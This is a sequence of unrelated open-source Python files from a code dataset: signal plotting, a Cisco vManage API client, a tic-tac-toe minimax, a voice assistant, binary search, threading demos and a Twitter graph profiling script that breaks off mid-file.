Plot_Speed_Acceleration(self):\n # This function plots speed and normalized acceleration of random driver's steering wheel signal. \n chosen_subject = random.randint(0, len(self.subjects)-1)\n subject = self.subjects_analysis[chosen_subject]\n \n fig1, ax = plt.subplots(2,1,figsize=(15,10))\n ax = ax.flatten()\n \n ax[0].plot(subject.TimeStamp[0:subject.speed.size], subject.speed)\n ax[0].set_xlabel('TimeStamp [sec]'); ax[0].set_ylabel('Steering Speed [degree°/sec]')\n ax[0].set_title('Steering wheel speed:\\n' + self.subjects[chosen_subject].ID)\n \n ax[1].plot(subject.TimeStamp[0:subject.acc_normalized.size], subject.acc_normalized)\n ax[1].set_xlabel('TimeStamp [sec]'); ax[1].set_ylabel('Normalized Steering Acceleration [degree°/sec^2]')\n ax[1].set_title('Steering wheel Acceleration - Normalized:\\n' + self.subjects[chosen_subject].ID)\n fig1.show()\n \n def Plot_fft_visual(self):\n # This function plot a visualization of steering wheel acceleration signal in frequency domain for two drivers,\n # one not consumed alcohol, and one that does. In addition, each graph has a fitted baseline. \n chosen_drivers = [self.subjects[0], self.subjects[-1]]\n chosen_drivers_stats = [self.subjects_analysis[0], self.subjects_analysis[-1]]\n \n fig2, ax = plt.subplots(2,1,figsize=(15,10))\n ax = ax.flatten()\n \n for i, driver in enumerate(chosen_drivers_stats):\n ax[i].plot(driver.freqs, driver.fft_acc, label='FFT')\n ax[i].plot(driver.freqs, driver.baseline, label='Baseline')\n \n ax[i].legend()\n ax[i].set_xlabel('[Hz]'); ax[i].set_ylabel('dB'); ax[i].set_title(chosen_drivers[i].ID + '\\nSteering wheel acceleration: Frequency Domain')\n \n fig2.suptitle(\"Frequency Domain: Steering's acceleration signal\")\n fig2.show() \n \n \n def Plot_Acc_FFT_Statistics(self):\n # This function plots the insights of drivers' steering wheel acceleration signals in frequency domain\n num_of_stats = len(self.subjects_analysis[0].steering_acc_features) # Number of statistics to show\n keys_stats = list(self.subjects_analysis[0].steering_acc_features.keys()) # description of each stat (feature)\n drivers_stats = np.zeros((len(self.subjects),num_of_stats)) # preallocation with zeros array\n drivers_alcohol_cc = []\n rows = 2\n cols = int(np.ceil(num_of_stats/rows))\n \n # Creating a matrix of features per subject (Rows = subjects, Columns = features)\n for ind, driver in enumerate(self.subjects):\n drivers_stats[ind,:] = np.array(list(self.subjects_analysis[ind].steering_acc_features.values()))\n drivers_alcohol_cc.append(driver.Alcohol_cc) \n \n labels = [str(i) for i in drivers_alcohol_cc]\n \n fig3, ax = plt.subplots(rows, cols, figsize=(40,20))\n ax = ax.flatten()\n # Plot in barplot style - X axis: alcohol consumed (per subject), Y axis: feature value (per subject)\n for i, key in enumerate(keys_stats):\n \n ax[i].bar(range(len(labels)), drivers_stats[:,i], 0.5); \n ax[i].set_xticks(range(len(labels))); ax[i].set_xticklabels(labels)\n ax[i].set_xlabel('Alcohol consumed [cc]'); ax[i].set_ylabel(key); ax[i].set_title(key + '\\nSteering wheel acceleration: Frequency Domain')\n \n # Add driver name to each column\n for j,name in enumerate(self.IDs):\n ax[i].text(j, drivers_stats[j,i], name, ha='center')\n \n fig3.suptitle(\"Frequency Domain: Steering wheel acceleration's signal features\")\n fig3.show() \n \n \n def Plot_peak_detection(self):\n # This function plots random driver's steering wheel signal with peak detection in overlay.\n chosen_subject = random.randint(0, len(self.subjects)-1)\n subject = self.subjects_analysis[chosen_subject]\n \n fig4 = plt.figure()\n plt.plot(subject.TimeStamp, subject.Steering)\n plt.scatter(subject.TimeStamp[subject.peaks_locs], subject.Steering[subject.peaks_locs], color='red')\n plt.xlabel('TimeStamp [sec]'); plt.ylabel('Steering [degree°]')\n plt.title('Peak Detection algorithm visualization:\\n' + self.subjects[chosen_subject].ID)\n \n fig4.show() \n \n \n # %% DATASETS\n def get_DF_with_sub_signals(self):\n # This function creates a csv file and a pandas DataFrame with sub signals label to each entry for each subject, with data manipulation\n # to the TimeStamp and Steering.\n DF_with_sub_signals = pd.DataFrame()\n \n for _,subject in enumerate(self.subjects): \n df = subject.create_personal_DF()\n DF_with_sub_signals = pd.concat([DF_with_sub_signals, df], axis=0)\n \n DF_with_sub_signals.to_csv('Dataset_with_sub_signals.csv', encoding='utf-8')\n return DF_with_sub_signals\n\n\n\n \n","repo_name":"Yuvalmaster/Steering-Wheel-Signal-Analysis","sub_path":"Data_plotter.py","file_name":"Data_plotter.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13984669110","text":"\"\"\"Cisco vManage Cluster API Methods.\n\"\"\"\n\nfrom vmanage.api.http_methods import HttpMethods\nfrom vmanage.data.parse_methods import ParseMethods\n\n\nclass Cluster(object):\n \"\"\"vManage Cluster API\n\n Responsible for DELETE, GET, POST, PUT methods against vManage\n Cluster.\n\n \"\"\"\n def __init__(self, session, host, port=443):\n \"\"\"Initialize Cluster object with session parameters.\n\n Args:\n session (obj): Requests Session object\n host (str): hostname or IP address of vManage\n port (int): default HTTPS 443\n\n \"\"\"\n\n self.session = session\n self.host = host\n self.port = port\n self.base_url = f'https://{self.host}:{self.port}/dataservice/'\n\n def get_cluster_connected_devices_list(self, vmanage_cluster_ip):\n \"\"\"Obtain vManage cluster connected devices\n\n Args:\n vmanage_cluster_ip (str): vManage cluster interface IP address\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/connectedDevices/{vmanage_cluster_ip}\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_health_details_list(self):\n \"\"\"Obtain vManage cluster health details\n\n Args:\n None (None):\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/health/details\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_health_status_list(self):\n \"\"\"Obtain vManage cluster health status\n\n Args:\n None (None):\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/health/status\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_list(self):\n \"\"\"Obtain vManage cluster list\n\n Args:\n None (None):\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/list\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_ip_addresses_dict(self):\n \"\"\"Obtain vManage cluster IP addresses\n\n Args:\n None (None):\n\n Returns:\n result (dict): All data associated with a response.\n \"\"\"\n\n result = {}\n vmanages = self.get_cluster_list()\n for vmanage in vmanages[0]['data']:\n vmanage_id = vmanage['vmanageID']\n url = f\"{self.base_url}clusterManagement/iplist/{vmanage_id}\"\n response = HttpMethods(self.session, url).request('GET')\n # result = ParseMethods.parse_data(response)\n result[vmanage_id] = response['json']\n return result\n\n def get_cluster_ready_state(self):\n \"\"\"Obtain vManage cluster ready state\n\n Args:\n None (None):\n\n Returns:\n result (bool): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/isready\"\n response = HttpMethods(self.session, url).request('GET')\n result = response['json']['isReady']\n # result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_node_properties(self):\n \"\"\"Obtain connected vManage cluster node properties\n\n Args:\n None (None):\n\n Returns:\n result (dict): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/nodeProperties\"\n response = HttpMethods(self.session, url).request('GET')\n result = response['json']\n # result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_tenancy_mode(self):\n \"\"\"Obtain vManage cluster tenancy mode\n\n Args:\n None (None):\n\n Returns:\n result (dict): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/tenancy/mode\"\n response = HttpMethods(self.session, url).request('GET')\n result = ParseMethods.parse_data(response)\n return result\n\n def get_cluster_vmanage_details_list(self, vmanage_cluster_ip):\n \"\"\"Obtain vManage cluster specific vManage details using cluster interface IP\n\n Args:\n vmanage_cluster_ip (str): vManage cluster interface IP address\n\n Returns:\n result (list): All data associated with a response.\n \"\"\"\n\n url = f\"{self.base_url}clusterManagement/vManage/details/{vmanage_cluster_ip}\"\n response = HttpMethods(self.session, url).request('GET', timeout=30)\n result = ParseMethods.parse_data(response)\n return result\n","repo_name":"CiscoDevNet/python-viptela","sub_path":"vmanage/api/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"75"} +{"seq_id":"31967095689","text":"import logging\nfrom typing import List, Tuple\n\nimport torch\nfrom reagent.core import types as rlt\nfrom reagent.prediction.predictor_wrapper import DiscreteDqnWithPreprocessor\n\nlogger = logging.getLogger(__name__)\n\n\nclass BanditRewardNetPredictorWrapper(torch.jit.ScriptModule):\n def __init__(\n self,\n reward_model_with_preprocessor: DiscreteDqnWithPreprocessor,\n action_names: List[str],\n state_feature_config: rlt.ModelFeatureConfig,\n ) -> None:\n super().__init__()\n self.reward_model_with_preprocessor = torch.jit.trace(\n reward_model_with_preprocessor,\n reward_model_with_preprocessor.input_prototype(),\n )\n self.action_names = torch.jit.Attribute(action_names, List[str])\n\n @torch.jit.script_method\n def forward(\n self, state: rlt.ServingFeatureData\n ) -> Tuple[torch.Tensor, torch.Tensor]:\n reward_predictions = self.reward_model_with_preprocessor(state)\n num_examples = reward_predictions.size()[0]\n num_actions = len(self.action_names)\n assert reward_predictions.shape == (\n num_examples,\n num_actions,\n ), f\"Invalid shape {reward_predictions.shape} != ({num_examples}, {num_actions})\"\n mask = torch.ones_like(reward_predictions, dtype=torch.uint8)\n return (reward_predictions, mask)\n","repo_name":"facebookresearch/ReAgent","sub_path":"reagent/prediction/cfeval/predictor_wrapper.py","file_name":"predictor_wrapper.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":3467,"dataset":"github-code","pt":"75"} +{"seq_id":"70145588722","text":"import constants\nimport datetime\n\ndef date_range(startType, startAmount, endType=None, endAmount=None):\n\t''' returns a 2-tuple dtStart and dtEnd for time ranges. Time delta takes, 'days', 'seconds', 'minutes', 'hours', 'weeks' '''\n\n\tassert startType in constants.DATE_DELTA_TYPES, \"startType {} is invalid\".format(startType)\n\n\tdtStart = datetime.datetime.now() - datetime.timedelta(**{startType: startAmount})\n\t\n\tif endType == None or endAmount == None:\n\t\tdtEnd = datetime.datetime.now()\n\telse:\n\t\tdtEnd = datetime.datetime.now() - datetime.timedelta(**{endType: endAmount})\n\n\treturn dtStart, dtEnd\n\t","repo_name":"disler/1000notifier","sub_path":"any/date_helpers.py","file_name":"date_helpers.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2518842625","text":"\"\"\"\nTic Tac Toe Player\n\"\"\"\n\nimport math\nfrom copy import deepcopy\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\n\ndef initial_state():\n \"\"\"\n Returns starting state of the board.\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\n\ndef player(board):\n \"\"\"\n Returns player who has the next turn on a board.\n \"\"\"\n x_count = 0\n o_count = 0\n\n for i in board:\n for j in i:\n if j == X:\n x_count+=1\n elif j == O:\n o_count+=1\n\n if x_count > o_count:\n return O\n else:\n return X\n\n\ndef actions(board):\n \"\"\"\n Returns set of all possible actions (i, j) available on the board.\n \"\"\"\n actions = set()\n\n for i in range (3):\n for j in range(3):\n if board[i][j] == EMPTY:\n actions.add((i, j))\n\n return actions\n\n\ndef result(board, action):\n \"\"\"\n Returns the board that results from making move (i, j) on the board.\n \"\"\"\n if action not in actions(board):\n raise Exception\n\n board_copy = deepcopy(board)\n board_copy[action[0]][action[1]] = player(board_copy)\n\n return board_copy\n\n\ndef winner(board):\n \"\"\"\n Returns the winner of the game, if there is one.\n \"\"\"\n # rows\n if (board[0][0] == board[0][1]) and (board[0][0] == board[0][2]) and (board[0][0] != EMPTY):\n return board[0][0]\n if (board[1][0] == board[1][1]) and (board[1][0] == board[1][2]) and (board[1][0] != EMPTY):\n return board[1][0]\n if (board[2][0] == board[2][1]) and (board[2][0] == board[2][2]) and (board[2][0] != EMPTY):\n return board[2][0]\n # columns\n if (board[0][0] == board[1][0]) and (board[0][0] == board[2][0]) and (board[0][0] != EMPTY):\n return board[0][0]\n if (board[0][1] == board[1][1]) and (board[0][1] == board[2][1]) and (board[0][1] != EMPTY):\n return board[0][1]\n if (board[0][2] == board[1][2]) and (board[0][2] == board[2][2]) and (board[0][2] != EMPTY):\n return board[0][2]\n # diags\n if (board[0][0] == board[1][1]) and (board[0][0] == board[2][2]) and (board[1][1] != EMPTY):\n return board[0][0]\n if (board[0][2] == board[1][1]) and (board[0][2] == board[2][0]) and (board[1][1] != EMPTY):\n return board[0][2]\n\n return None\n\n\ndef terminal(board):\n \"\"\"\n Returns True if game is over, False otherwise.\n \"\"\"\n if winner(board) is not None or not actions(board):\n return True\n else:\n return False\n\n\ndef utility(board):\n \"\"\"\n Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n \"\"\"\n curr_winner = winner(board)\n\n if curr_winner == X:\n return 1\n elif curr_winner == O:\n return -1\n else:\n return 0\n\n\ndef minimax(board):\n \"\"\"\n Returns the optimal action for the current player on the board.\n \"\"\"\n if terminal(board):\n return None\n elif board == initial_state():\n return 0, 1\n else:\n curr_player = player(board)\n best_value = float(\"-inf\") if curr_player == X else float(\"inf\")\n\n for action in actions(board):\n new = perform_minimax(result(deepcopy(board), action), best_value)\n\n if curr_player == X:\n new = max(best_value, new)\n elif curr_player == O:\n new = min(best_value, new)\n\n if new != best_value:\n best_value = new\n move = action\n\n return move\n \n\ndef perform_minimax(board, best_value):\n if terminal(board):\n return utility(board)\n else:\n curr_player = player(board)\n value = float(\"-inf\") if curr_player == X else float(\"inf\")\n\n for action in actions(board):\n new = perform_minimax(result(board, action), value)\n\n if curr_player == X:\n if new > best_value:\n return new\n value = max(value, new)\n elif curr_player == O:\n if new < best_value:\n return new\n value = min(value, new)\n\n return value\n\n\n\n\n\n\n\n\n","repo_name":"hannahbrooks/cs50-ai","sub_path":"tictactoe/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32176283538","text":"import json\n\n\nclass StateParser():\n def __init__(self, resp: dict):\n self.time = resp['time']\n self.states = [self._parseState(s) for s in resp['states']]\n\n def _parseState(self, state: list):\n return {\n 'icao24': state[0],\n 'callsign': state[1],\n 'origin_country': state[2],\n 'updated_at': state[4],\n 'position': {\n 'lon': state[5],\n 'lat': state[6]\n },\n 'velocity': state[9],\n 'altitude': state[13]\n }","repo_name":"annis-souames/flights-metrics","sub_path":"api/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"8026961869","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\nimport threading\nimport time\n\nevent = threading.Event()\n\ndef lighter():\n count = 0\n event.set()\n while True:\n if count > 5 and count <= 10:\n event.clear() # 清空标志位变成红灯\n print(\"\\033[41;1m红灯\\033[0m\")\n elif count > 10:\n event.set() # 变成绿灯\n count = 0\n else:\n print(\"\\033[42;1m绿灯\\033[0m\")\n time.sleep(1)\n count += 1\n\ndef car(name):\n while True:\n if event.is_set():\n print(\"%s is running......\" % name)\n time.sleep(1)\n else:\n print(\"%s 遇到红灯 waiting......\" % name)\n event.wait()\n print(\"\\033[42;1m%s 绿灯亮了,Let's go!!\\033[0m\"% name)\n\nlight = threading.Thread(target=lighter,)\nlight.start()\n\ncar1 = threading.Thread(target=car,args=(\"Tesla\",))\ncar1.start()","repo_name":"huyuedong/travel","sub_path":"09/红绿灯.py","file_name":"红绿灯.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3537763592","text":"import json\n\nfrom storyhub.sdk.service.Lifecycle import Lifecycle\nfrom storyhub.sdk.service.LifecycleOption import (\n LifecycleOption,\n LifecycleOptionType,\n)\nfrom tests.storyhub.sdk.JsonFixtureHelper import JsonFixtureHelper\n\nlifecycle_fixture = JsonFixtureHelper.load_fixture(\"lifecycle_fixture\")\n\nlifecycle_fixture_json = json.dumps(lifecycle_fixture)\n\n\ndef test_deserialization(mocker):\n mocker.patch.object(json, \"loads\", return_value=lifecycle_fixture)\n\n mocker.patch.object(LifecycleOption, \"from_dict\")\n\n assert Lifecycle.from_json(jsonstr=lifecycle_fixture_json) is not None\n\n json.loads.assert_called_with(lifecycle_fixture_json)\n\n LifecycleOption.from_dict.assert_called_with(\n data={\n \"type\": LifecycleOptionType.STARTUP,\n \"lifecycle_option\": lifecycle_fixture[\"lifecycle\"][\"startup\"],\n }\n )\n\n\ndef test_serialization(mocker):\n mocker.patch.object(json, \"dumps\", return_value=lifecycle_fixture_json)\n\n service_command = Lifecycle.from_dict(data=lifecycle_fixture)\n\n assert service_command.as_json(compact=True) is not None\n json.dumps.assert_called_with(lifecycle_fixture, sort_keys=True)\n\n assert service_command.as_json() is not None\n json.dumps.assert_called_with(lifecycle_fixture, indent=4, sort_keys=True)\n","repo_name":"wilzbach/hub-sdk-python","sub_path":"tests/storyhub/sdk/service/Lifecycle_test.py","file_name":"Lifecycle_test.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18940359270","text":"\"\"\"\nFind the last position of a target number in a sorted array. Return -1 if target does not exist.\n\nExample\nExample 1:\n\nInput: nums = [1,2,2,4,5,5], target = 2\nOutput: 2\nExample 2:\n\nInput: nums = [1,2,2,4,5,5], target = 6\nOutput: -1\n\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param nums: An integer array sorted in ascending order\n @param target: An integer\n @return: An integer\n \"\"\"\n def lastPosition(self, nums, target):\n\n if not nums:\n return - 1\n #create 2 pointers start and end of list\n left, right = 0, len(nums) - 1\n #most important part of binary search needs to check left +1 vs right\n while left + 1 < right:\n #create a mid point\n mid = (left + right) // 2\n #needs to be included since we are looking for the last index.\n if nums[mid] <= target:\n left = mid\n else:\n right = mid\n #checks to see right index first if it is return right index else left and if not either return -1\n if nums[right] == target:\n return right\n elif nums[left] == target:\n return left\n else:\n return -1\n","repo_name":"charlessokolowski/Problems","sub_path":"Binary Search/find_last_index.py","file_name":"find_last_index.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31870075613","text":"import speech_recognition as sr\nimport pyttsx3\nimport datetime\nimport calendar\nimport wikipedia\nimport webbrowser\nimport subprocess\nimport pause\nimport wolframalpha\nimport requests\nimport json\n\n\nMASTER = \"sir\"\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[0].id)\n\ndef speak(text):\n engine.say(text)\n engine.runAndWait()\n\ndef wishme():\n hour = int(datetime.datetime.now().hour)\n\n if hour>=0 and hour <12:\n speak(\"Good Morning \"+ MASTER)\n elif hour>=12 and hour <18:\n print(\"Good Afternoon \"+ MASTER)\n speak(\"Good Afternoon \" + MASTER)\n else:\n print(\"Good Evening \" + MASTER)\n speak(\"Good Evening \"+ MASTER)\n\ndef today_date():\n now = datetime.datetime.now()\n date_now = datetime.datetime.today()\n week_now = calendar.day_name[date_now.weekday()]\n month_now = now.month\n day_now = now.day\n\n months = [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\",\n ]\n\n ordinals = [\n \"1st\",\n \"2nd\",\n \"3rd\",\n \"4th\",\n \"5th\",\n \"6th\",\n \"7th\",\n \"8th\",\n \"9th\",\n \"10th\",\n \"11th\",\n \"12th\",\n \"13th\",\n \"14th\",\n \"15th\",\n \"16th\",\n \"17th\",\n \"18th\",\n \"19th\",\n \"20th\",\n \"21st\",\n \"22nd\",\n \"23rd\",\n \"24th\",\n \"25th\",\n \"26th\",\n \"27th\",\n \"28th\",\n \"29th\",\n \"30th\",\n \"31st\",\n ]\n\n return \"Today is \" + week_now + \", \" + months[month_now - 1] + \" the \" + ordinals[day_now - 1] + \".\"\n\ndef takecmd():\n r=sr.Recognizer()\n with sr.Microphone() as source :\n print(\"Listening...\")\n audio = r.listen(source)\n\n query = \" \"\n\n try :\n print(\"recognizing...\")\n query = r.recognize_google(audio,language='en-us')\n print(\"You said: \" + query)\n\n\n except Exception as e:\n speak(\"Say That again !\")\n query = \"None\"\n return query\n\nprint(\"Initializing ...\")\nspeak(\"Initializing ...\")\nprint(f\"Hello{MASTER}\")\nspeak(f\"Hello{MASTER}\")\nwishme()\nspeak(f\"{MASTER} What do you want me to do for you : \")\n\ndef note(text):\n date = datetime.datetime.now()\n file_name = str(date).replace(\":\", \"-\") + \"-note.txt\"\n with open(file_name, \"w\") as f:\n f.write(text)\n\n subprocess.Popen([\"notepad.exe\", file_name])\n\n\ndef assistant(query):\n\n\n\n if 'time' in query:\n time = datetime.datetime.now().strftime(\"%H:%M\")\n speak(f\"The current Time is {time}\")\n print(f\"{time}\")\n\n elif \"wikipedia\" in query :\n query = query.replace('wikipedia','')\n speak(\"Searching Wikipedia ...\")\n results = wikipedia.summary(query,sentences=2)\n print(results)\n speak(results)\n\n print(\"Done Sir, Anything Else !\")\n speak(\"Done Sir, Anything Else !\")\n\n elif \"who are you\" in query :\n print(\"I am your Assistant Pheonix. i can look up answers for you and if you need anything just ask. Your wish is my command\")\n speak(\"I am your Assistant Pheonix. i can look up answers for you and if you need anything just ask. Your wish is my command\")\n\n elif \"why do you exist\" in query or \"why did you come\" in query:\n speak(f\"It is a secret.\")\n\n elif \"how are you\" in query:\n print(\"I am fine, Thank you for asking!. This is challenging time for us. i hope your and your loved ones are safe and healthy\")\n speak(\"I am fine, Thank you for asking!. This is challenging time for us. i hope your and your loved ones are safe and healthy\")\n print(\"\\nHow are you?\")\n speak(\"\\nHow are you?\")\n\n elif \"so lets move on\" in query :\n speak(\"what you want me to do sir\")\n\n elif \"fine\" in query or \"good\" in query:\n print(\"It's good to know that you are fine\")\n speak(\"It's good to know that you are fine\")\n\n elif \"spotify\" in query :\n print(\"Opening Spotify\")\n speak(\"Opening Spotify\")\n subprocess.Popen([\"C:\\\\Users\\\\rutvi\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe\"])\n\n print(\"Spotify Opened , Anything Else Sir\")\n speak(\"Spotify Opened , Anything Else Sir\")\n\n elif \"steam\" in query :\n speak(\"Let's get some frags Sir\")\n result = subprocess.Popen([\"D:\\STEAM\\\\steam.exe\"], shell=True)\n\n speak(\"Done Sir, Anything Else !\")\n\n elif \"open\" in query :\n try :\n website = query.split(' ')\n webbrowser.open(\"https://\"+website[website.index(\"open\")+1]+\".com\")\n speak(website[website.index(\"open\")+1] + \"is Opened \")\n except Exception as e :\n speak(\"i can't see it\")\n\n elif \"calculate\" in query:\n app_id = \"XXX\"\n client = wolframalpha.Client(app_id)\n ind = query.lower().split().index(\"calculate\")\n text = query.split()[ind + 1:]\n res= client.query(\" \".join(text))\n answer = next(res.results).text\n print(\"The answer is \" + answer)\n speak(\"The answer is \" + answer)\n\n elif \"what is\" in query or \"who is\" in query:\n app_id = \"XXX\"\n client = wolframalpha.Client(app_id)\n ind = query.lower().split().index(\"is\")\n text = query.split()[ind + 1:]\n res = client.query(\" \".join(text))\n answer = next(res.results).text\n print(answer)\n speak(answer)\n\n elif \"note\" in query or \"remember this\" in query:\n speak(\"What would you like me to write down?\")\n note_text = takecmd()\n note(note_text)\n speak(\"I have made a note of that.\")\n speak(\"Anything else sir !\")\n\n elif \"where is\" in query :\n ind = query.lower().split().index(\"is\")\n location = query.split()[ind + 1:]\n url = \"https://www.google.com/maps/place/\" + \"\".join(location)\n speak(\"This is where \" + str(location) + \" is.\")\n webbrowser.open(url)\n\n elif \"search\" in query.lower ():\n ind = query.lower().split().index(\"search\")\n search = query.split()[ind + 1:]\n webbrowser.open(\n \"https://www.google.com/search?q=\" + \"+\".join(search))\n speak(\"Searching \" + str(search) + \" on google\")\n\n elif \"weather\" in query:\n key = \"XXXX\"\n weather_url = \"http://api.openweathermap.org/data/2.5/weather?\"\n ind = query.split().index(\"in\")\n location = query.split()[ind + 1:]\n location = \"\".join(location)\n url = weather_url + \"appid=\" + key + \"&q=\" + location\n js = requests.get(url).json()\n if js[\"cod\"] != \"404\":\n weather = js[\"main\"]\n temperature = weather[\"temp\"]\n temperature = temperature - 273.15\n humidity = weather[\"humidity\"]\n desc = js[\"weather\"][0][\"description\"]\n weather_response = \" The temperature in Celcius is \" + str(temperature) + \" The humidity is \" + str(\n humidity) + \" and The weather description is \" + str(desc)\n print(weather_response)\n speak(weather_response)\n else:\n speak(\"City Not Found\")\n\n elif \"play\" in query :\n website = query.split('play')\n webbrowser.open(\"https://www.youtube.com/results?search_query=\" + \"+\".join(website) )\n print(\"playing \" + str(website) + \" on youtube\")\n speak(\"playing \" + str(website) + \" on youtube\")\n\n\n elif \"sleep\" in query or \"stop\" in query or \"do not listen\" in query:\n speak(\"for how many seconds do you want me to sleep\")\n a = int(takecmd())\n pause.sleep(a)\n speak(str(a) + f\" seconds completed {MASTER}. Now you can ask me anything\")\n\n elif \"goodbye\" in query :\n speak(f\"My pleasure to help you {MASTER}, See you later\")\n return 0\n\n\n else:\n speak(\"It seems its out of my own way lets try it later !\")\n\n\nwhile True:\n if assistant(takecmd().lower())==0:\n break\n","repo_name":"Rutvik84/Python-Projects","sub_path":"Virtual Assistant/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":8047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74801871283","text":"import sys\nimport os\nfrom pathlib import Path\nimport time\n\nweb_path = os.path.join(Path(os.path.abspath(\"./\")).parents[0], 'web')\nsys.path.append(os.path.join(os.getcwd(), 'twitter_graph_iterator'))\nsys.path.append(os.path.join(os.getcwd(), 'twitter_node_generator'))\nsys.path.append(os.path.join(os.getcwd(), 'profile_twitter_user'))\nsys.path.append(web_path)\nsys.path.append(os.path.join(os.getcwd(), 'pbd_graph_iterator'))\n\nfrom iterator import GraphIterator\nfrom node_generator import NodeGenerator\nfrom api import twitterAPIWrapper\nfrom ms_profiler import MSProfileUser\n\nfrom pbd_graph_iterator import pbditerator\nfrom render_website import render\n\nfrom pathlib import Path\nfrom ast import literal_eval\n\nimport pickle\nimport argparse\n\nimport numpy as np\n\ndefault_path = Path(os.path.abspath(\"./\")).parents[0]\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', dest='path', type=str, required=False, default=default_path)\nparser.add_argument('--iter', dest='iterations', type=int, required=False, default=120)\nparser.add_argument('--names', nargs='+', dest='names', required=False, default=[])\nparser.add_argument('--pbditer', dest='pbditer', required=False, default=320, type=int)\nparser.add_argument('--featureiter', dest='featureiter', required=False, default=130, type=int)\nparser.add_argument('--profile', dest='profile', required=False, default='', type=str)\nparser.add_argument('--mcsamples', dest='mcsamples', required=False, default=1200, type=int)\nparser.add_argument('--fmcsamples', dest='fmcsamples', required=False, default=200, type=int)\nparser.add_argument('-show', dest='show', action='store_true')\nparser.add_argument('-train', dest='train', action='store_true')\nparser.add_argument('--partyprofile', dest='partyprofile', action='store_true')\nparser.add_argument('--setparty', dest='setparty', type=str, default='')\nparser.add_argument('-add', '--addnodes', nargs='+', dest='addnodes', required=False)\nparser.add_argument('-c', '--connect', dest='con', required=False)\n\nargs = parser.parse_args()\ngraph = None\ngraph_iterator = None\n\ntry:\n stored_graph = open(os.path.join(args.path, 'data/graph'), 'rb')\n if stored_graph is not None:\n graph = pickle.load(stored_graph)\nexcept FileNotFoundError:\n pass\n\nwith open(os.path.join(Path(os.path.abspath(\"./\")).parents[0], 'twitter_creds/creds.txt'), 'r') as file:\n CREDENTIALS = literal_eval(file.read())\n if len(args.names) == 0:\n names = ['@Spolitik',\n '@NyeBorgerlige',\n '@DanskDf1995',\n '@KonservativeDK',\n '@venstredk',\n '@radikale',\n '@LiberalAlliance',\n '@SFpolitik',\n '@Enhedslisten',\n '@alternativet_',\n '@friegronne',\n '@veganerpartiet',\n \"@KDDanmark\",\n ]\n else:\n names = args.names\n if not graph:\n graph_iterator = GraphIterator(NodeGenerator(CREDENTIALS), seed_names=names)\n else:\n graph_iterator = graph\n graph_iterator.seed_names = names\n\n if args.addnodes and len(args.addnodes) > 0:\n for node_handle in args.addnodes:\n graph_iterator.expand_graph(node_handle)\n\nif args.profile != '' and args.setparty == '':\n profiler = MSProfileUser(name=args.profile, graph=graph)\n maxlikelihood = profiler(samples=args.mcsamples, fsamples=args.fmcsamples, search_connection=args.con)\n print('')\n print('--# Best Result #--')\n print(maxlikelihood)\n\n if args.show:\n profiler.show()\n\nif args.partyprofile:\n payload = []\n party_members = []\n for node_id in graph.nodes:\n node = graph.nodes[node_id]\n if node.party:\n payload.append(node.id)\n party_members.append(node.name)\n\n profiler = MSProfileUser(name=payload, graph=graph)\n E = profiler(samples=args.mcsamples, fsamples=args.fmcsamples)\n\n if args.show:\n profiler.show()\n\nif args.setparty != '' and args.profile != '':\n node = NodeGenerator(CREDENTIALS).new(args.profile, args.setparty)\n if not node.id in graph.nodes:\n 